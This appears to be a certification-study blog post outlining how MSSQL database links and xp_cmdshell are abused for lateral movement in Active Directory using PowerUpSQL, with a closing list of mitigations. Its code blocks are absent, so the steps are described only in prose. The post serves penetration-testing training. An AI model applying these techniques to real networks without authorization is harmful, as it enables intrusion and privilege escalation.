The Road to CRTP Cert - Part 30

Introduction

Dear Professionals, welcome back to “The Road to CRTP Blog” series! In our previous post, we explored Privilege Escalation Across Domain Trusts using ADCS, let’s shift our attention to Trust Abuse via MSSQL Servers.

Let’s continue this exciting journey towards CRTP success!

Trust Abuse via MSSQL Servers

Microsoft SQL (MSSQL) servers are widely used in enterprise environments, often deployed across Windows domains. Their integration with Active Directory makes them a common target for lateral movement during penetration tests and red team engagements. Since domain users can be assigned different database roles, attackers can abuse these permissions for privilege escalation and network traversal.

For enumeration and exploitation, we will leverage PowerUpSQL, a powerful tool that helps identify misconfigurations and execute attacks on SQL Servers. You can find the tool here: PowerUpSQL.

Discovery: Finding SQL Servers in the Domain

Before exploiting MSSQL servers, we need to identify their presence in the domain.

SPN Scanning (Finding MSSQL Instances)

SQL Servers register Service Principal Names (SPNs) in Active Directory. We can leverage this to identify SQL instances:

Check Accessibility

Once MSSQL instances are found, we check their accessibility:

To test all discovered instances for accessibility:

Gather Additional Information

To retrieve detailed information about each SQL Server:

Abusing Database Links for Lateral Movement

Understanding Database Links

SQL Database Links allow one SQL Server to access external data sources, including:

When database links exist between SQL servers, an attacker can execute stored procedures across them, even across forest trusts, enabling further compromise.

Enumerating Database Links

Finding Linked Servers

Use PowerUpSQL to check for linked SQL servers:

Or, manually via SQL query:

Enumerating Database Links via Queries

The OPENQUERY() function allows execution of queries on a linked database:

To enumerate multiple linked servers, we use PowerUpSQL:

Chaining Linked Server Queries

If SQL Servers are linked in a chain, we can query deeper:

Executing Commands via Database Links

Enabling xp_cmdshell for OS Command Execution

To execute system commands, xp_cmdshell must be enabled. If it’s disabled but rpcout is enabled, we can enable xp_cmdshell remotely:

Executing Commands on a Target SQL Server

Using PowerUpSQL, we can run OS commands remotely:

Executing Nested Queries for Deep Lateral Movement

If there are multiple linked SQL servers in a chain, we can execute OS commands across them:

Conclusion

SQL Server misconfigurations, especially Database Links and xp_cmdshell, offer strong opportunities for lateral movement in Windows domains. By leveraging tools like PowerUpSQL, attackers can exploit these weaknesses to move across networks and escalate privileges. Organizations should regularly audit SQL Server permissions, disable unnecessary features, and monitor unusual activity to prevent such abuses.

Mitigation Recommendations:

✅ Restrict xp_cmdshell usage.

✅ Monitor linked server configurations.

✅ Use strong authentication for MSSQL accounts.

✅ Regularly audit domain user roles in SQL Server.

✅ Apply least privilege principle to database users.

By addressing these issues, organizations can significantly reduce their attack surface and prevent unauthorized access through MSSQL abuse.

Thank you for taking the time to read my blog. Wishing you a joyful learning experience ahead!